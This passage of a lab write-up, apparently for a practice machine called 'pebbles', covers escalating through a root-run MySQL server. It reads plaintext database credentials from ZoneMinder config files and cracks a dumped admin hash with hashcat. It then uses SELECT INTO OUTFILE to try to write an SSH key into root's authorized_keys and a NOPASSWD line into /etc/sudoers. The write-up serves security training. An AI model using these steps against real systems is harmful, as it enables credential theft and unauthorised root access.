MySQL
An internal MySQL instance has been identified.
www-data@pebbles:/$ ps ps -auxww | grep -i mysql
root 1155 0.0 21.0 1153680 213876 ? Ssl 17:50 0:00 /usr/sbin/mysqldThe interesting bit here is that the mysqld process is running with privileges of the root account.
root user
www-data@pebbles:/usr/share/zoneminder/www$ cat /etc/zm/zm.conf | grep -v '^[#/]'
ZM_PATH_DATA=/usr/share/zoneminder
ZM_PATH_BIN=/usr/bin
ZM_PATH_LIB=/usr/lib/x86_64-linux-gnu
ZM_PATH_CONF=/etc/zm
ZM_PATH_WEB=/usr/share/zoneminder/www
ZM_PATH_CGI=/usr/lib/zoneminder/cgi-bin
ZM_WEB_USER=www-data
ZM_WEB_GROUP=www-data
ZM_DB_TYPE=mysql
ZM_DB_HOST=localhost
ZM_DB_NAME=zm
ZM_DB_USER=root
ZM_DB_PASS=ShinyLucentMarker361
ZM_SERVER_HOST=The configuration file for ZoneMinder, /etc/zm/zm.conf, reveals the DB credential; root:ShinyLucentMarker361
This file was discovered by PEAS as well
zmuser user
www-data@pebbles:/usr/share/zoneminder/www$ cat api/app/Config/database.php
<?php
class DATABASE_CONFIG {
public $default = array(
'datasource' => 'Database/Mysql',
'persistent' => false,
'host' => 'localhost',
'login' => 'zmuser',
'password' => 'zmpass',
'database' => 'zm',
'prefix' => '',
//'encoding' => 'utf8',
);
public $test = array(
'datasource' => 'Database/Mysql',
'persistent' => false,
'host' => 'localhost',
'login' => 'user',
'password' => 'password',
'database' => 'test_database_name',
'prefix' => '',
//'encoding' => 'utf8',
);
}Another DB credential for the API access; zmuser:zmpass
Connection
the root user likely has higher privileges, so I will connect as the root user
www-data@pebbles:/usr/share/zoneminder/www/includes$ mysql -h localhost -uroot -pShinyLucentMarker361
pShinyLucentMarker361root -
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 172
Server version: 5.7.30-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> Session established as the root user
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| zm |
+--------------------+
5 rows in set (0.00 sec)
mysql> use zm;
use zm;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changedzm.Users Table
mysql> select Username,Password from zm.Users;
+----------+-------------------------------------------+
| Username | Password |
+----------+-------------------------------------------+
| admin | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 |
+----------+-------------------------------------------+
1 row in set (0.00 sec)Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ hashcat --show '4ACFE3202A5FF5CF467898FC58AAB1D615029441'
# | Name | Category
======+============================================================+======================================
100 | SHA1 | Raw Hash
6000 | RIPEMD-160 | Raw Hash
170 | sha1(utf16le($pass)) | Raw Hash
4700 | sha1(md5($pass)) | Raw Hash salted and/or iterated
18500 | sha1(md5(md5($pass))) | Raw Hash salted and/or iterated
4500 | sha1(sha1($pass)) | Raw Hash salted and/or iterated
300 | MySQL4.1/MySQL5 | Database Server
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ hashcat -a 0 -m 300 '4ACFE3202A5FF5CF467898FC58AAB1D615029441' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Host memory required for this attack: 3 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
4acfe3202a5ff5cf467898fc58aab1d615029441:admin
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 300 (MySQL4.1/MySQL5)
Hash.Target......: 4acfe3202a5ff5cf467898fc58aab1d615029441
Time.Started.....: Tue Mar 11 22:47:21 2025 (0 secs)
Time.Estimated...: Tue Mar 11 22:47:21 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2675.5 kH/s (0.80ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 24576/14344385 (0.17%)
Rejected.........: 0/24576 (0.00%)
Restore.Point....: 12288/14344385 (0.09%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: havana -> 280789
Hardware.Mon.#1..: Util: 10%
Started: Tue Mar 11 22:47:20 2025
Stopped: Tue Mar 11 22:47:23 2025Password hash cracked; admin
mysql.users Table
mysql> select User,authentication_string from mysql.user;
select User,authentication_string from mysql.user;
+------------------+-------------------------------------------+
| User | authentication_string |
+------------------+-------------------------------------------+
| root | *D11862AF9458F6F9B9C584C4606CFF81BA0DD442 |
| mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| mysql.sys | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| debian-sys-maint | *818BD5A8C5DD77E81FBB077415EA3BCE42B597CA |
| zmuser | *C1D2D6FC5C596AFB19FFC4331DF6DAA287749A3E |
+------------------+-------------------------------------------+
5 rows in set (0.00 sec)root credential is known and the zmuser user is the only none default user
hashcat was unable to crack the password hash
root Privileges
mysql> SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
+--------------------------------+-------------------------+--------------+
| grantee | privilege_type | is_grantable |
+--------------------------------+-------------------------+--------------+
| 'root'@'localhost' | SELECT | YES |
| 'root'@'localhost' | INSERT | YES |
| 'root'@'localhost' | UPDATE | YES |
| 'root'@'localhost' | DELETE | YES |
| 'root'@'localhost' | CREATE | YES |
| 'root'@'localhost' | DROP | YES |
| 'root'@'localhost' | RELOAD | YES |
| 'root'@'localhost' | SHUTDOWN | YES |
| 'root'@'localhost' | PROCESS | YES |
| 'root'@'localhost' | FILE | YES |
| 'root'@'localhost' | REFERENCES | YES |
| 'root'@'localhost' | INDEX | YES |
| 'root'@'localhost' | ALTER | YES |
| 'root'@'localhost' | SHOW DATABASES | YES |
| 'root'@'localhost' | SUPER | YES |
| 'root'@'localhost' | CREATE TEMPORARY TABLES | YES |
| 'root'@'localhost' | LOCK TABLES | YES |
| 'root'@'localhost' | EXECUTE | YES |
| 'root'@'localhost' | REPLICATION SLAVE | YES |
| 'root'@'localhost' | REPLICATION CLIENT | YES |
| 'root'@'localhost' | CREATE VIEW | YES |
| 'root'@'localhost' | SHOW VIEW | YES |
| 'root'@'localhost' | CREATE ROUTINE | YES |
| 'root'@'localhost' | ALTER ROUTINE | YES |
| 'root'@'localhost' | CREATE USER | YES |
| 'root'@'localhost' | EVENT | YES |
| 'root'@'localhost' | TRIGGER | YES |
| 'root'@'localhost' | CREATE TABLESPACE | YES |
| 'mysql.session'@'localhost' | SUPER | NO |
| 'mysql.sys'@'localhost' | USAGE | NO |
| 'debian-sys-maint'@'localhost' | SELECT | YES |
| 'debian-sys-maint'@'localhost' | INSERT | YES |
| 'debian-sys-maint'@'localhost' | UPDATE | YES |
| 'debian-sys-maint'@'localhost' | DELETE | YES |
| 'debian-sys-maint'@'localhost' | CREATE | YES |
| 'debian-sys-maint'@'localhost' | DROP | YES |
| 'debian-sys-maint'@'localhost' | RELOAD | YES |
| 'debian-sys-maint'@'localhost' | SHUTDOWN | YES |
| 'debian-sys-maint'@'localhost' | PROCESS | YES |
| 'debian-sys-maint'@'localhost' | FILE | YES |
| 'debian-sys-maint'@'localhost' | REFERENCES | YES |
| 'debian-sys-maint'@'localhost' | INDEX | YES |
| 'debian-sys-maint'@'localhost' | ALTER | YES |
| 'debian-sys-maint'@'localhost' | SHOW DATABASES | YES |
| 'debian-sys-maint'@'localhost' | SUPER | YES |
| 'debian-sys-maint'@'localhost' | CREATE TEMPORARY TABLES | YES |
| 'debian-sys-maint'@'localhost' | LOCK TABLES | YES |
| 'debian-sys-maint'@'localhost' | EXECUTE | YES |
| 'debian-sys-maint'@'localhost' | REPLICATION SLAVE | YES |
| 'debian-sys-maint'@'localhost' | REPLICATION CLIENT | YES |
| 'debian-sys-maint'@'localhost' | CREATE VIEW | YES |
| 'debian-sys-maint'@'localhost' | SHOW VIEW | YES |
| 'debian-sys-maint'@'localhost' | CREATE ROUTINE | YES |
| 'debian-sys-maint'@'localhost' | ALTER ROUTINE | YES |
| 'debian-sys-maint'@'localhost' | CREATE USER | YES |
| 'debian-sys-maint'@'localhost' | EVENT | YES |
| 'debian-sys-maint'@'localhost' | TRIGGER | YES |
| 'debian-sys-maint'@'localhost' | CREATE TABLESPACE | YES |
| 'zmuser'@'localhost' | USAGE | NO |
+--------------------------------+-------------------------+--------------+
59 rows in set (0.00 sec)As expected, the current DB user, root, has full privileges over the instance
Write Access
mysql> SSELECT 'am I root?' INTO OUTFILE '/tmp/output';
Query OK, 1 row affected (0.00 sec)
www-data@pebbles:/tmp$ cat output
am I root?
www-data@pebbles:/tmp$ ll output
4.0K -rw-rw-rw- 1 root root 11 Mar 11 18:32 outputFile write is possible as the root account using the the MySQL instance
mysql> SELECT 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' INTO OUTFILE '/root/.ssh/authorized_keys';
ERROR 1 (HY000): Can't create/write to file '/root/.ssh/authorized_keys' (Errcode: 2 - No such file or directory)Attempting to write Kali’s SSH public key failed as the /root/.ssh/authorized_keys does not exist.
mysql> SELECT 'www-data ALL=(ALL) NOPASSWD: ALL' INTO OUTFILE '/etc/sudoers';
ERROR 1086 (HY000): File '/etc/sudoers' already existsAttempting to write to the sudoers file also fails as it already exists. Overwriting is not possible. There is another method. It’s via loading a malicious library